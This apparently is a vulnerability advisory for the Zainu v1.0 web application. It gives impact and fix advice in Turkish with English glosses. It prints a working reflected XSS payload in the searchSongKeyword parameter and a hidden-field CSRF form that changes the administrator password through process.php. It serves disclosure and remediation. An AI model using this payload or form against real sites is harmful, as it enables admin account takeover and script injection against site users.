< ------------------- header data start ------------------- >

#############################################################

# Application Name : Zainu v1.0

# Vulnerability Type : XSRF (CSRF) - XSS

# Infection : Admin şifresi değiştirilebilir ..! Cookie'ler çalınabilir. (Impact: the admin password can be changed via XSRF; cookies can be stolen via XSS.)

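# Bug Fix Advice : Form'a Oturum Key'i (Session Token) eklenmelidir ! - zararlı karakterler filtrelenmelidir. (A session token must be added to the form and checked by the server before the password change is accepted; harmful characters in user input such as searchSongKeyword must be filtered, and the value should be HTML-encoded wherever it is written back into the page.)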

# Demo : http://www.zainu.com/demo/

# author : CWCaspeR ~ Bug Researchers

#############################################################

< ------------------- header data end ------------------- >

< -- bug code start -- >

[XSS]
/index.php?searchSongKeyword=><script>alert(’CaspeR’)</script>

[XSRF]
<!--
  XSRF demonstration form from the advisory, annotated for defenders.
  It posts action=Admin/password with password and retype_password to process.php.
  The form carries no session/anti-CSRF token field and no current-password field,
  which is the gap the advisory's fix advice addresses: process.php should reject
  this request unless it carries a valid per-session token (and, ideally, the
  administrator's current password).
  "hedefsite.com" and "BUTONADI" appear to be placeholders (Turkish for
  "target site" and "button name"), not real values.
-->
<form action=http://hedefsite.com/process.php method=post>
<input type=hidden name=action value=Admin/password>
<input class=input type=hidden name=password value=NEWpassWORD>
<input class=input type=hidden name=retype_password value=NEWpassWORD>
<input class=but type=submit value=BUTONADI>
</form>

< -- bug code end -- >